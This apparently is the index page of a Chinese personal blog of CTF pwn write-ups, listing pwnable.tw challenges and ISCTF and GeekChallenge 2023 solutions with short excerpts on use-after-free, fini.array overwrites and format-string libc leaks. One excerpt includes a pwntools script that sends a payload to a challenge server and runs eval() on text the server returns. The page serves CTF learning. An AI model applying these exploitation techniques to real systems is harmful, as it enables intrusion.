feichai's Blog

0%

pwnable-hacknote

发表于 2024-01-27 更新于 2024-06-07 分类于 pwnable.tw
本文字数： 1.7k 阅读时长 ≈ 2 分钟

一道UAF漏洞基础题

阅读全文 »

pwnable-3x17

发表于 2024-01-26 更新于 2024-06-07 分类于 pwnable.tw
本文字数： 1.8k 阅读时长 ≈ 2 分钟

第一反应有点像之前做过的一道fmt漏洞，通过修改fini.array地址内容为mian地址达到无限次循环，这个题省略了fmt漏洞，让你可以直接修改地址内容，根据程序执行流程图，main函数执行完后会执行fini.array

阅读全文 »

pwnable-dubblesort

发表于 2024-01-25 更新于 2024-06-07 分类于 pwnable.tw
本文字数： 1.5k 阅读时长 ≈ 1 分钟

连接题目后，发现输入字符后会带出一些不可见字符，再分析源码，是因为程序没有将缓冲区清空导致的，所以栈内可能会存在一些有用的数据

阅读全文 »

pwnable-orw

发表于 2024-01-20 更新于 2024-06-07 分类于 pwnable.tw
本文字数： 1.7k 阅读时长 ≈ 2 分钟

orw入门题

阅读全文 »

pwnable-calc

发表于 2024-01-18 更新于 2024-06-07 分类于 pwnable.tw
本文字数： 3.2k 阅读时长 ≈ 3 分钟

对于一个尚未入门的菜鸟来说，这道题刷新了我对漏洞利用的理解，赶巧碰上感冒，花了好几天结合大佬的wp才理清逻辑，那么废话不多说，直接开始解题。。。

阅读全文 »

ISCTF 2023 wp pwn 部分题解

发表于 2023-11-29 更新于 2024-06-07 分类于 write up
本文字数： 2.3k 阅读时长 ≈ 2 分钟

ezpie

func函数地址被放入栈中，用fmt漏洞读出地址，然后算真实地址，泄露puts，匹配这个版本libc6_2.31-0ubuntu9.10_amd64的libc

阅读全文 »

GeekChallenge 2023 wp pwn 部分题解

发表于 2023-11-28 更新于 2024-06-07 分类于 write up
本文字数： 3.7k 阅读时长 ≈ 3 分钟

nc pwntools

from pwn import *
p=remote("pwn.node.game.sycsec.com",31441)
context(arch="amd64",os="linux",log_level="debug")


pd1 = b'a'*92 + b'\x53\x79\x63\x6c\x6F\x76\x65\x72'
p.recvuntil(b'This string need to be 100 characters long')

p.send(pd1)

p.recvuntil(b'2.This challenge is harder than first one')
calc = p.recvuntil('=',drop=True)
p.sendline(str(eval(calc)))

p.interactive()

阅读全文 »

Pwn虚拟机环境配置超详细版

发表于 2023-10-18 更新于 2024-06-07 分类于笔记
本文字数： 2.2k 阅读时长 ≈ 2 分钟

原来的虚拟机被我搞崩了，只能重装了(脚本全无了呜呜呜)，看到网上的安装教程都比较零碎，多多少少也有点小瑕疵，因此，我决定水一篇博客(bushi)，写一下我的pwn虚拟机环境全套安装路程。

阅读全文 »